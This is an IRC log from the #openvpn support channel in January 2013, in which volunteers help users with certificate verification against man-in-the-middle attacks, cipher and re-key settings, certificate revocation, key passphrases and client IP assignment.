14:26 -!- frsk [fredrik@joy.frsk.net] has joined #openvpn 14:29 -!- mdw [~mdw@cpc8-dals18-2-0-cust303.hari.cable.virginmedia.com] has joined #openvpn 14:30 -!- kantlivelong [~kantlivel@home.kantlivelong.com] has quit [Ping timeout: 240 seconds] 14:37 -!- kantlivelong [~kantlivel@home.kantlivelong.com] has joined #openvpn 15:12 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has quit [Quit: Leaving] 15:32 -!- Cubox [cubox@unaffiliated/cubox] has left #openvpn ["WeeChat 0.4.0-rc1"] 15:48 -!- valparaiso [~valparais@ARennes-257-1-48-169.w81-53.abo.wanadoo.fr] has joined #openvpn 15:50 -!- Cubox [cubox@unaffiliated/cubox] has joined #openvpn 15:50 -!- Valcorb [Valcorb@94-226-106-113.access.telenet.be] has quit [] 15:53 -!- Cubox` [cubox@unaffiliated/cubox] has joined #openvpn 15:53 -!- Cubox [cubox@unaffiliated/cubox] has quit [Client Quit] 15:53 -!- Cubox` [cubox@unaffiliated/cubox] has quit [Client Quit] 15:54 -!- Cubox [cubox@unaffiliated/cubox] has joined #openvpn 15:59 -!- Cubox [cubox@unaffiliated/cubox] has left #openvpn ["WeeChat 0.3.9.2"] 16:27 -!- gffa [~unknown@unaffiliated/gffa] has quit [Ping timeout: 252 seconds] 16:36 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 252 seconds] 17:32 -!- Tativie [~Tativie@gateway/tor-sasl/tativie] has joined #openvpn 17:45 < Tativie> I am getting "WARNING: No server certificate verification method has been enabled." however the session seems to work well. However, the session seems to reset the key every 30 or so minutes: "TLS: tls_process: killed expiring key" is this something I should be concerned with. I would like for the encryption to be as strong as possible, even at expense to speed. 17:51 < Tativie> From the site "SSL/TLS renegotiation handshake which occurs once per client per hour" hmm maybe that is all I am seeing? 17:53 < Tativie> Looks like "cipher AES-256-CBC" might be a good choice? Or is there a stronger one? Is blowfish's 128 better in some ways? 17:55 -!- brute11k [~brute11k@89.249.230.101] has quit [Quit: Leaving.] 17:56 < Tativie> "http://infocenter.sybase.com/help/topic/com.sybase.infocenter.dc71335.1502/html/aserbwin/aserbwin27.htm" suggests "TLS_RSA_WITH_AES_256_CBC_SHA" is the strongest? Any advice? 18:10 < Tativie> Maybe I should try adding 'persist-key' & 'persist-tun' in the .conf? 18:11 -!- bsdgeek [~bsdgeek@91-66-20-106-dynip.superkabel.de] has joined #openvpn 18:13 < dioz> sounds reasonable 18:18 -!- Guest19661 [~LaStik@62.109.16.198] has quit [Quit: Peace.] 18:19 < Tativie> dioz, does having a short lived key have any advantages? 18:20 -!- b1rkh0ff [~b1rkh0ff@178.77.21.223] has quit [Ping timeout: 252 seconds] 18:20 < dioz> in terms of data encryption yeah it probably would 18:21 < dioz> if the party changes keys used at regular intervals 18:33 -!- b1rkh0ff [~b1rkh0ff@178.77.1.83] has joined #openvpn 18:47 <+pekster> Tativie: You have 2 choices for cipher/auth: one for the TLS control channel, and another for the data encryption/hash. I prefer blowfish (I tend to use 128 or 256-bit symmetric keys for that) as BF is generally faster during encryption and only slower during re-keying (which doesn't matter since you have a grace window anyway) 18:47 <+pekster> Tativie: You can improve your security against MITM downgrade attacks by limiting your allowed TLS ciphers to only those you select, or just a single one 18:48 <+pekster> As far as re-keying, the default values are probably fine; I tend to lower my tran-window to about 10 minutes instead of the default of 60, but that's just preference really 18:50 < Tativie> pekster: what line would I need to put in the .conf for 'cipher blowfish 256-bit symmetric key' and what would I need to put in the .conf to change the re-keying time to 10 minutes? 18:50 <+pekster> See 'openvpn --show-ciphers' for a cipher list that you use with the 'cipher' directive in the config file 18:51 <+pekster> The default keysize is used, unless the 'keysize' directive is specified 18:51 < Tativie> Also should I use 'user nobody' & 'group nobody' on both server and client side .conf files? 18:51 <+pekster> See also: --tran-window for the time the old key is valid after symmetric re-key is initiated 18:52 <+pekster> Tativie: Mixed bag as far as user downgrade. It can help if the application is ever compromised, but it means you must use --persist-key and possibly --persist-tun (depending on scripts/configuration) which lowers security slightly in the sense that the key material is in-RAM all the time 18:53 <+pekster> That's "usually" okay in a proper Unix-like environment with mlock, although I tend not to downgrade since it causes me more problems with my dynamic firewalling/routing I do on many of my VPN servers 18:53 <+pekster> Ultimately you need to figure out what method you consisder more secure 18:54 <+pekster> Here's my "standard" boilerplate TLS setup: http://fpaste.org/afNV/ 18:54 <+pekster> (you can use line 6 or 7 as you prefer based on how you sign your certs) 18:55 <+pekster> I just use the EKU only, so I use that as my client/server differentiator 18:55 <+pekster> Same for the client, but it has the server/TLS Web Server Authentication values for the remote cert 18:57 < Tativie> hmm. okay. Thanks for the help. I think that I need to do some more research to understand it better. I'm not even sure if I signed the certs right or not. But it does seem to be working. 18:58 <+pekster> The warning you get means that another valid client could pose as a server to the system issuing that warning 18:59 <+pekster> You should use a remote-cert validation method to restrict the client to talk to only certs that have been designated as a "server" cert; if you use easy-rsa it does that for you, or you can use the proper KU/EKU/ns-cert-type values yourself when you sign (if you manage your own PKI) 18:59 <+pekster> See: 18:59 <+pekster> !mitm 18:59 <@vpnHelper> "mitm" is (#1) http://openvpn.net/index.php/documentation/howto.html#mitm to know about stopping Man-in-the-Middle attacks by signing the server cert specially or (#2) use !servercert to generate the server cert manually or use the easy-rsa build-key-server script to build your server certificates or (#3) then use: ns-cert-type server in the client config 18:59 -!- valparaiso [~valparais@ARennes-257-1-48-169.w81-53.abo.wanadoo.fr] has left #openvpn [] 19:02 < Tativie> Thanks, I will check it out and try setting it up sometime. 19:03 <+pekster> !mitm forget 3 19:04 <+pekster> !forget mitm 3 19:04 <@vpnHelper> Error: You don't have the factoids.forget capability. If you think that you should have this capability, be sure that you are identified before trying again. The 'whoami' command can tell you if you're identified. 19:04 <+pekster> :\ 19:05 <+pekster> That should be remote-cert-tls as the new-and-preferred method 19:10 < Tativie> It looks like the server .conf file already has the persist-tun and persist-key active. Is the client does specify it also it uses expiring keys? 19:11 < Tativie> If the client does* 19:11 < Tativie> *does not specify* 19:11 <+pekster> All the --persist-* options only impact the local side, not the remote 19:11 <+pekster> It's for the X509 keys, not the ephemeral symmetric ones 19:12 -!- b1rkh0ff [~b1rkh0ff@178.77.1.83] has quit [Ping timeout: 246 seconds] 19:16 < Tativie> hmm, okay. I don't fully understand, but I take it that means the server .conf's use of the persist options does not really matter for my current session? 19:18 <+pekster> I don't understand the question 19:24 -!- nucl3ar [~atom@c-69-247-138-234.hsd1.tn.comcast.net] has quit [Quit: leaving] 19:26 -!- Guest47194 [~reise@180.210.201.168] has joined #openvpn 19:27 -!- Wintereise [Wintereise@113.11.122.231] has quit [Ping timeout: 246 seconds] 20:09 -!- HyperGlide [~HyperGlid@182.151.63.232] has joined #openvpn 20:18 -!- cjs226 [~cjs226@99-61-64-43.lightspeed.austtx.sbcglobal.net] has quit [Ping timeout: 248 seconds] 20:45 -!- HyperGlide [~HyperGlid@182.151.63.232] has quit [Remote host closed the connection] 20:45 -!- HyperGlide [~HyperGlid@li385-100.members.linode.com] has joined #openvpn 20:47 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Remote host closed the connection] 20:51 -!- Cpt-Oblivious [~Cpt-Obliv@a202101.upc-a.chello.nl] has quit [Ping timeout: 248 seconds] 20:55 -!- mojtaba [~Thunderbi@CPE0026f321a168-CM0026f321a165.cpe.net.cable.rogers.com] has joined #openvpn 20:55 < mojtaba> Hi 20:55 < mojtaba> I have just installed openvpn 20:55 < mojtaba> Is there anybody who can help me to configure it? 20:55 < mojtaba> I have installed it on latest version of Ubuntu 20:56 < mojtaba> and would like to connect to it with windows clients and also with android mobile clients. 20:56 < mojtaba> I am also pretty new to Linux era. 20:56 < mojtaba> Any simplified help is highly appreciated. 20:57 < mojtaba> Is anybody there? 20:57 < mojtaba> hello? 20:57 < dioz> hi 20:57 < mojtaba> dioz: hi 20:57 < mojtaba> Can you help me? 20:58 < dioz> !welcome 20:58 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. || Also interesting: !man !/30 !topology !iporder !sample !forum !wiki 20:58 <@vpnHelper> !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict) 20:59 < mojtaba> vpnHelper: Could you explain more, (sorry), I am also new to IRC. 20:59 < mojtaba> I would like to access internet through openvpn to bypass filtering. 21:00 < mojtaba> I am going to set it up in my home and go to trip. 21:02 < mojtaba> hello? 21:02 < mojtaba> Anybody there? 21:27 -!- Wulf [~Wulf@unaffiliated/wulf] has quit [Ping timeout: 260 seconds] 21:40 < EugeneKay> Nope. 21:40 < EugeneKay> !howto 21:40 <@vpnHelper> "howto" is (#1) OpenVPN comes with a great howto, http://openvpn.net/howto PLEASE READ IT! or (#2) http://www.secure-computing.net/openvpn/howto.php for a mirror 21:40 < EugeneKay> !redirect 21:40 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart: 21:40 <@vpnHelper> http://ircpimps.org/redirect.png 21:41 < EugeneKay> Getting the basic VPN working(being able to ping over the tun interface) is the hardest part, because of the PKI stuff. 21:41 < EugeneKay> The howto covers it all pretty well. 21:41 -!- cjs226 [~cjs226@99-61-64-43.lightspeed.austtx.sbcglobal.net] has joined #openvpn 22:00 -!- black_ [black@2001:470:8cf8::29] has joined #openvpn 22:00 -!- blackmagic [~black@ip98-185-21-138.rn.hr.cox.net] has quit [Quit: Leaving] 22:00 -!- black_ is now known as blackmagic 22:04 -!- blackmagic [black@2001:470:8cf8::29] has quit [Quit: ZNC - http://znc.in] 22:49 -!- blackmagic [black@2001:470:8cf8::29] has joined #openvpn 23:35 -!- blackmagic [black@2001:470:8cf8::29] has quit [Quit: ZNC - http://znc.in] 23:40 -!- blackmagic [black@got.laid.using.blackmajic.org] has joined #openvpn --- Day changed Mon Jan 21 2013 00:04 -!- Tativie [~Tativie@gateway/tor-sasl/tativie] has quit [Quit: Leaving.] 00:07 -!- mojtaba [~Thunderbi@CPE0026f321a168-CM0026f321a165.cpe.net.cable.rogers.com] has quit [Quit: mojtaba] 00:08 -!- b1rkh0ff [~b1rkh0ff@178.77.1.83] has joined #openvpn 00:38 -!- EugeneKay [eugene@itvends.com] has quit [Quit: ZNC - http://znc.in] 00:38 -!- EugeneKay [eugene@stretchmyan.us] has joined #openvpn 00:49 -!- kobolduk [~kobolduk@office.prolocation.net] has joined #openvpn 00:59 -!- Guest47194 [~reise@180.210.201.168] has quit [Ping timeout: 244 seconds] 01:00 -!- Wintereise [Wintereise@113.11.122.231] has joined #openvpn 01:00 -!- Wintereise [Wintereise@113.11.122.231] has quit [Changing host] 01:00 -!- Wintereise [Wintereise@unaffiliated/wintereise] has joined #openvpn 01:15 -!- brute11k [~brute11k@89.249.230.101] has joined #openvpn 01:33 -!- Friberg [~Friberg@h-223-133.a176.priv.bahnhof.se] has quit [Ping timeout: 255 seconds] 01:47 -!- Minnebo [~Minnebo@office.exabyte.be] has joined #openvpn 01:47 < Minnebo> !bridge 01:48 <@vpnHelper> "bridge" is (#1) http://openvpn.net/index.php/documentation/miscellaneous/ethernet-bridging.html for the doc or (#2) http://openvpn.net/index.php/documentation/faq.html#bridge1 for info from the FAQ or (#3) also see !tunortap and !layer2 and read --server-bridge in the manual (!man) or (#4) also see !whybridge 01:48 < Minnebo> !whybridge 01:48 <@vpnHelper> "whybridge" is (#1) you only bridge if you want layer2 to the lan. if you want layer2 only between vpn nodes then routed tap is enough. if you only want layer3 use tun. or (#2) See this URL for a more in-depth discussion on bridging vs routing: https://community.openvpn.net/openvpn/wiki/BridgingAndRouting 01:58 < Minnebo> openvpn is a pain in the ass 01:58 < Minnebo> i guess i will install pfsense 02:13 -!- Wulf [~Wulf@unaffiliated/wulf] has joined #openvpn 02:13 -!- thinkHell [~Hell@85.15.47.27] has joined #openvpn 02:18 -!- ade_b [~Ade@109.58.66.70.bredband.tre.se] has joined #openvpn 02:18 -!- ade_b [~Ade@109.58.66.70.bredband.tre.se] has quit [Changing host] 02:18 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 03:18 -!- thinkHell [~Hell@85.15.47.27] has quit [Quit: ["pop()"]] 03:38 -!- Azrael808 [~peter@212.161.9.162] has joined #openvpn 04:14 -!- fling [~fling@fsf/member/fling] has joined #openvpn 04:15 < fling> how to remove a key from easy-rsa base? 04:15 -!- AsadH [~AsadH@unaffiliated/asadh] has joined #openvpn 04:17 < fling> do I need to just delete files? what about .pem? 04:51 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has joined #openvpn 04:52 -!- brute11k [~brute11k@89.249.230.101] has quit [Ping timeout: 248 seconds] 04:55 -!- brute11k [~brute11k@89.249.230.101] has joined #openvpn 05:02 -!- HyperGlide [~HyperGlid@li385-100.members.linode.com] has quit [Ping timeout: 246 seconds] 05:03 -!- HyperGlide [~HyperGlid@182.149.69.53] has joined #openvpn 05:23 -!- brute11k [~brute11k@89.249.230.101] has quit [Ping timeout: 244 seconds] 05:25 -!- brute11k [~brute11k@89.249.230.101] has joined #openvpn 05:26 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 05:41 -!- bsdgeek [~bsdgeek@91-66-20-106-dynip.superkabel.de] has quit [Quit: ByeBye] 05:47 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 256 seconds] 05:55 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn 05:58 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [Ping timeout: 256 seconds] 06:03 -!- dydzEz2_ [Konigsberg@c-67-163-13-78.hsd1.il.comcast.net] has joined #openvpn 06:05 -!- Minnebo [~Minnebo@office.exabyte.be] has quit [Ping timeout: 244 seconds] 06:06 -!- dydzEz2 [dydzEz2@c-67-163-13-78.hsd1.il.comcast.net] has quit [Ping timeout: 248 seconds] 06:08 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 245 seconds] 06:11 -!- ikonia [~irc@unaffiliated/ikonia] has left #openvpn [] 06:13 -!- Azrael808 [~peter@212.161.9.162] has quit [Ping timeout: 252 seconds] 06:13 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 06:15 -!- HyperGlide [~HyperGlid@182.149.69.53] has quit [Remote host closed the connection] 06:16 -!- brute11k [~brute11k@89.249.230.101] has quit [Ping timeout: 248 seconds] 06:16 -!- HyperGlide [~HyperGlid@li385-100.members.linode.com] has joined #openvpn 06:16 -!- brute11k [~brute11k@89.249.230.101] has joined #openvpn 06:18 -!- ade_b [~Ade@redhat/adeb] has quit [Remote host closed the connection] 06:19 -!- ade_b [~Ade@109.58.66.70.bredband.tre.se] has joined #openvpn 06:19 -!- ade_b [~Ade@109.58.66.70.bredband.tre.se] has quit [Changing host] 06:19 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 06:27 -!- Azrael808 [~peter@212.161.9.162] has joined #openvpn 06:28 -!- brute11k [~brute11k@89.249.230.101] has quit [Ping timeout: 255 seconds] 06:30 -!- kobolduk [~kobolduk@office.prolocation.net] has quit [Quit: ["Textual IRC Client: www.textualapp.com"]] 06:30 -!- brute11k [~brute11k@89.249.230.101] has joined #openvpn 06:36 -!- brute11k1 [~brute11k@89.249.230.101] has joined #openvpn 06:37 -!- brute11k [~brute11k@89.249.230.101] has quit [Ping timeout: 240 seconds] 06:39 -!- Azrael808 [~peter@212.161.9.162] has quit [Ping timeout: 256 seconds] 06:42 -!- mh__ [~mh@dev.hollo.dk] has joined #openvpn 06:42 < mh__> hi.. im looking for a way to validate when my ssl cert expires remotely, is that possible somehow? 06:42 < mh__> i have been looking at the parameters that i can give openssl.. but cannot really find a way 06:43 < AsadH> What do you mean mh__? 06:43 < AsadH> Take a look at http://uk1.php.net/openssl_x509_parse 06:43 <@vpnHelper> Title: PHP: openssl_x509_parse - Manual (at uk1.php.net) 06:43 < mh__> AsadH: i would like my nagios server to monitor when my server cert of my openvpn server expires.. 06:43 < mh__> AsadH: thanks a lot 06:46 -!- Wintereise [Wintereise@unaffiliated/wintereise] has quit [] 06:46 -!- Winterei- [~reise@205.185.126.190] has joined #openvpn 06:51 -!- Azrael808 [~peter@212.161.9.162] has joined #openvpn 06:52 -!- niervol [~krystian@193.106.244.150] has joined #openvpn 06:54 < mh__> hm.. but that requires that i have the public cert.. are there any way to get the cert from a remote host? that will be the first step.. 06:54 <@ecrist> no 06:56 -!- IT2 [~userit@86.120.191.55] has joined #openvpn 06:56 < mh__> okay.. that make my search a lot easier.. 06:56 < AsadH> mh__ I think you can 06:57 <@ecrist> you need the certificate to check the expiration date. 06:57 <@ecrist> you could have a server-side client-connect script, though 06:57 <@ecrist> since that data is part of what's checked by openvpn 06:57 < AsadH> http://www.asadhaider.co.uk/test.php 06:57 < AsadH> gets google cert info 06:57 < AsadH> [validTo] => 130930235959Z 06:58 < mh__> AsadH: you did that with the openssl functions in php? 06:58 <@ecrist> AsadH: that's because google presents their certificate for connecting web clients 06:58 <@ecrist> openvpn clients don't present their certificate, since they're not listening for connections 06:58 < AsadH> oh, you mean openvpn certs? 06:58 < AsadH> Sorry :P 06:58 < AsadH> I don't even use openvpn 06:58 < mh__> AsadH: oh okay.. yes thats openvpn certs 06:58 <@ecrist> wtf are you here for, then, AsadH? 06:59 < AsadH> Oh, no. That's for SSL certs 06:59 < mh__> then the answer would be no.. well.. then i just have to make the check on the firewall 06:59 -!- IT2 is now known as Marius 06:59 -!- Marius is now known as Guest25156 06:59 < AsadH> ecrist: I'm planning to use it at some point :P I've only used openvpn-as 07:01 -!- Guest25156 [~userit@86.120.191.55] has left #openvpn [] 07:04 -!- Winterei- is now known as Wintereise 07:04 -!- Wintereise [~reise@205.185.126.190] has quit [Changing host] 07:04 -!- Wintereise [~reise@unaffiliated/wintereise] has joined #openvpn 07:09 -!- mh__ [~mh@dev.hollo.dk] has left #openvpn [] 07:31 -!- niervol [~krystian@193.106.244.150] has quit [Read error: No route to host] 07:36 -!- niervol [~krystian@193.106.244.150] has joined #openvpn 07:56 -!- khem_ [~x@lotus.redl8.com] has joined #openvpn 07:57 < khem_> is there some good way to monitor a OpenVPN service without running a management interface for each and every OpenVPN daemon, if i have several of them? 08:01 -!- niervol [~krystian@193.106.244.150] has quit [Quit: Leaving.] 08:04 -!- niervol [~krystian@193.106.244.150] has joined #openvpn 08:04 < blackmagic> management interface? 08:05 < AsadH> he might mean access server 08:07 < con3x> SSH! 08:08 < con3x> :P 08:08 -!- cjs226 [~cjs226@99-61-64-43.lightspeed.austtx.sbcglobal.net] has quit [] 08:10 -!- HyperGlide [~HyperGlid@li385-100.members.linode.com] has quit [Remote host closed the connection] 08:16 -!- zu [~zu@ks387228.kimsufi.com] has quit [Ping timeout: 276 seconds] 08:18 -!- Porkepix [~Porkepix@lns-bzn-33-82-252-63-56.adsl.proxad.net] has quit [Ping timeout: 248 seconds] 08:37 -!- gustavoz [~gustavoz@host110.190-225-90.telecom.net.ar] has joined #openvpn 08:47 -!- KaiForce [~chatzilla@adsl-70-228-76-146.dsl.akrnoh.ameritech.net] has joined #openvpn 08:59 -!- d12fk [~heiko@exit0.net] has joined #openvpn 09:00 <@ecrist> khem_: no 09:00 <@ecrist> you need to monitor each process separately, or you need to monitor each processes status-log 09:01 -!- cjs226 [~cjs226@99-42-101-89.lightspeed.austtx.sbcglobal.net] has joined #openvpn 09:14 <+pekster> fling: If you want to revoke a cert you've issued, you should use the revoke-full script, and then generate and publish the CRL to your server so the certificate can't be used by a client that no longer should connect 09:15 < fling> pekster: hmm hmm 09:16 < fling> pekster: what is CRL? 09:16 <+pekster> !crl 09:16 <@vpnHelper> "crl" is (#1) --crl-verify A CRL (certificate revocation list) is used when a particular key is compromised but when the overall PKI is still intact. The only time when it would be necessary to rebuild the entire PKI from scratch would be if the root certificate key itself was compromised. or (#2) you can make use of CRL by using the revoke-full script in easy-rsa (packaged with openvpn) that 09:16 <@vpnHelper> will create the CRL file for you. ssl-admin will also build a crl for you 09:21 -!- grass_ [pinne@46.246.119.109] has left #openvpn [] 09:23 -!- Daedy [~deed02392@ks353738.kimsufi.com] has quit [Read error: Operation timed out] 09:26 -!- deed02392 [~deed02392@ks353738.kimsufi.com] has joined #openvpn 09:46 < AsadH> novaflash ! 09:46 < AsadH> novaflash novaflash novaflash http://i.imgur.com/ELGcY8x.jpg 09:48 -!- afuentes [~afuentes@213.37.131.197.static.user.ono.com] has joined #openvpn 09:49 -!- Mcloven [~Mcloven@ppp203-122-218-215.static.internode.on.net] has joined #openvpn 09:51 -!- Minnebo [~Minnebo@office.exabyte.be] has joined #openvpn 09:52 -!- JPeterson [~JPeterson@s213-103-211-58.cust.tele2.se] has quit [Read error: Operation timed out] 09:55 -!- Minnebo_ [~Minnebo@office.exabyte.be] has joined #openvpn 09:55 -!- Minnebo [~Minnebo@office.exabyte.be] has quit [Read error: Connection reset by peer] 09:59 -!- ade_b [~Ade@redhat/adeb] has quit [Quit: Too sexy for his shirt] 10:12 -!- brute11k1 [~brute11k@89.249.230.101] has quit [Ping timeout: 256 seconds] 10:12 -!- brute11k [~brute11k@89.249.230.101] has joined #openvpn 10:22 -!- master_of_master [~master_of@p57B52132.dip.t-dialin.net] has quit [Ping timeout: 252 seconds] 10:24 -!- master_of_master [~master_of@p57B5425D.dip.t-dialin.net] has joined #openvpn 10:27 -!- nimbius [~cicero@108-85-136-152.lightspeed.irvnca.sbcglobal.net] has joined #openvpn 10:28 < nimbius> hi openvpn, i have a private key with a password. how can i supply it during connection? 10:28 < nimbius> !welcome 10:28 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. || Also interesting: !man !/30 !topology !iporder !sample !forum 10:28 <@vpnHelper> !wiki !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict) 10:28 < nimbius> !goal i want to supply my private key password during connection 10:29 -!- MeanderingCode [~Meanderin@199.254.238.179] has joined #openvpn 10:29 <+pekster> nimbius: Normally the passphrase for an encrypted X509 key will be prompted for on STDIN; some frontends use the management interface to supply it using a method more suitable to the program (eg: a GUI window or such for a graphical frontend) 10:29 <+pekster> You can techncially tell openvpn to get the passphrase from a text file, but doing some largely makes encrypting your key pointless since anyone who can find the config can see the path to the file with your plaintext passphrase 10:30 < nimbius> pekster: thanks. im using an init.d script that references my openvpn.conf for the office 10:31 <+pekster> Then pick a more suitable method since STDIN isn't normally exposed to the user during distro init processing. Maybe use the management interface and look at the '--management-hold' option until you manually give it the passphrase, or don't encrypted your key if you want it to automatically connect without user input 10:32 <+pekster> nimbius: References in the manpage for you to consider can be found in the following directives: --management, --management-hold, --management-client-auth, and --auth-user-pass 10:33 <+pekster> Or decrypting the key via 'openssl rsa -in encrypted.key -out unencrypted.key' 10:33 -!- Minnebo_ [~Minnebo@office.exabyte.be] has quit [Ping timeout: 252 seconds] 10:49 -!- Valcorb [Valcorb@94-226-106-113.access.telenet.be] has joined #openvpn 10:49 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-136.233.wb.wifirst.net] has joined #openvpn 10:53 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn 10:55 < nimbius> pekster: thanks for your help :) openvpn runs well now! 10:55 -!- nimbius [~cicero@108-85-136-152.lightspeed.irvnca.sbcglobal.net] has left #openvpn ["ahoi"] 10:57 -!- raidz_away is now known as raidz 10:58 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has joined #openvpn 11:02 -!- goldkatze [~nobody@unaffiliated/goldkatze] has joined #openvpn 11:02 -!- Valcorb [Valcorb@94-226-106-113.access.telenet.be] has quit [Ping timeout: 256 seconds] 11:04 -!- Azrael808 [~peter@212.161.9.162] has quit [Read error: Operation timed out] 11:18 -!- Valcorb [~Valcorb@199.229.249.189] has joined #openvpn 11:19 -!- Minnebo_ [~Minnebo@78-23-254-38.access.telenet.be] has joined #openvpn 11:23 -!- s7r [~s7r@openvpn/user/s7r] has joined #openvpn 11:23 -!- mode/#openvpn [+v s7r] by ChanServ 11:24 -!- afuentes [~afuentes@213.37.131.197.static.user.ono.com] has quit [Ping timeout: 260 seconds] 11:24 -!- Valcorb [~Valcorb@199.229.249.189] has quit [Ping timeout: 252 seconds] 11:25 -!- Valcorb [~Valcorb@94-226-106-113.access.telenet.be] has joined #openvpn 11:26 -!- dazo is now known as dazo_afk 11:29 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 11:37 -!- dioz [~dioz@2001:470:d:e3::1] has quit [Ping timeout: 264 seconds] 11:37 -!- Olipro [~Olipro@uncyclopedia/pdpc.21for7.olipro] has quit [Ping timeout: 264 seconds] 11:37 -!- Champi [Champi@rootshell.fr] has quit [Ping timeout: 264 seconds] 11:37 -!- Champi [Champi@rootshell.fr] has joined #openvpn 11:38 -!- BtbN [~btbn@btbn.de] has quit [Ping timeout: 264 seconds] 11:38 -!- KiNgMaR [~ingmar@2a00:1828:2000:289::cafe:d00d] has quit [Ping timeout: 264 seconds] 11:41 -!- dioz [~dioz@2001:470:d:e3::1] has joined #openvpn 11:42 -!- BtbN [~btbn@btbn.de] has joined #openvpn 11:42 -!- Olipro [~Olipro@uncyclopedia/pdpc.21for7.olipro] has joined #openvpn 11:43 -!- KiNgMaR [~ingmar@2a00:1828:2000:289::cafe:d00d] has joined #openvpn 11:47 -!- Valcorb [~Valcorb@94-226-106-113.access.telenet.be] has quit [Read error: Connection reset by peer] 11:49 -!- ade_b [~Ade@kista.guest.accome.com] has joined #openvpn 11:49 -!- ade_b [~Ade@kista.guest.accome.com] has quit [Changing host] 11:49 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 11:50 -!- Valcorb [~Valcorb@94-226-106-113.access.telenet.be] has joined #openvpn 11:51 -!- catsup [~d@64.111.123.163] has joined #openvpn 11:56 -!- JPeterson [~JPeterson@s213-103-211-58.cust.tele2.se] has joined #openvpn 11:59 -!- combat7331 [~Mamba@d54C66165.access.telenet.be] has joined #openvpn 11:59 < combat7331> Hello 11:59 < combat7331> How can I randomely set the IP that is connected to with OpenVPN 11:59 -!- Netsplit *.net <-> *.split quits: @vpnHelper, clu5ter, b00gz_, dioz, ben1066, DBordello, Cybertinus, ngharo, KiNgMaR, |Mike| 11:59 -!- Netsplit over, joins: Cybertinus, clu5ter 11:59 < combat7331> Something like ISP do, "Dynamic IP" 12:00 -!- b00gz_ [uid6869@gateway/web/irccloud.com/x-yssobzmevvtknuoq] has joined #openvpn 12:00 -!- AsadH is now known as zz_AsadH 12:00 -!- Valcorb [~Valcorb@94-226-106-113.access.telenet.be] has quit [Read error: Connection reset by peer] 12:01 <+pekster> combat7331: Are you asking about how to randomly connect to one of a number of profiles, or to hand out IPs from your server-side pool of IPs in a random fashion 12:07 -!- ngharo [~ngharo@shepard.sypherz.com] has joined #openvpn 12:10 -!- ben1066 [~quassel@2a03:b200:9::824e:1e6e] has joined #openvpn 12:10 -!- ben1066 [~quassel@2a03:b200:9::824e:1e6e] has quit [Changing host] 12:10 -!- ben1066 [~quassel@unaffiliated/ben1066] has joined #openvpn 12:10 -!- |Mike| [mike@2001:0:53aa:64c:28ac:7181:2b66:b9f1] has joined #openvpn 12:10 -!- DBordello [~DBordello@unaffiliated/dbordello] has joined #openvpn 12:11 -!- dioz [~dioz@2001:470:d:e3::1] has joined #openvpn 12:11 -!- KiNgMaR [~ingmar@2a00:1828:2000:289::cafe:d00d] has joined #openvpn 12:11 < combat7331> @pekster, just randomly everytime a user connects a new IP. 12:11 <+pekster> I still don't understand. Randomize what? I also don't understand "everytime a user connects to a new IP" either 12:12 <+pekster> By default, OpenVPN already acts similar to DHCP in that a client only gets an IP from the server for as long as they remain connected 12:12 < combat7331> Everytime a user connects to my OpenVPN server, it should assign that customer a random external IP. 12:12 <+pekster> If the user disconnects and reconnects, they may or may not get the same IP from the pool depending on pool avaibility 12:13 < combat7331> I am not regarding to the internal IP's. More about the external IP, that are assigned by the provider to me. 12:13 <+pekster> Okay, if you want that, you'll need to manage that in a --client-connect script and dyanmically generate an 'ifconfig-push' value in the temp file that script is passed to marshal the desired "random" IP to a client 12:13 <+pekster> OpenVPN does not care about any external association you have 12:13 < combat7331> Ah yeah, right. 12:13 < combat7331> Thanks 12:14 <+pekster> If you're using RFC1918 IPs to clients, that's fine. If you're somehow binding those unroutable IPs to an external IP, you need to do that dynamically via whatever scripting method you choose to manage the association 12:14 <+pekster> OpenVPN can hand out public IPs too, just like with private IPs. You should of course own the IP block you're using if you do that 12:14 < combat7331> I do own that 12:15 <+pekster> OpenVPN manages the pool for you with 'ifconfig-pool'. You're free to manage it yourself, but then it's on you to figure out how to keep track of free vs in-use IPs from the range you pass to clients 12:15 < combat7331> how does that ifconfig-push thing work? 12:16 <+pekster> Check the manpage for --ifconfig-push and feel free to ask a specific question if you're still confused after reading the supplied documentation 12:17 -!- |Mike| [mike@2001:0:53aa:64c:28ac:7181:2b66:b9f1] has quit [Ping timeout: 264 seconds] 12:18 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has quit [Remote host closed the connection] 12:21 -!- |Mike| 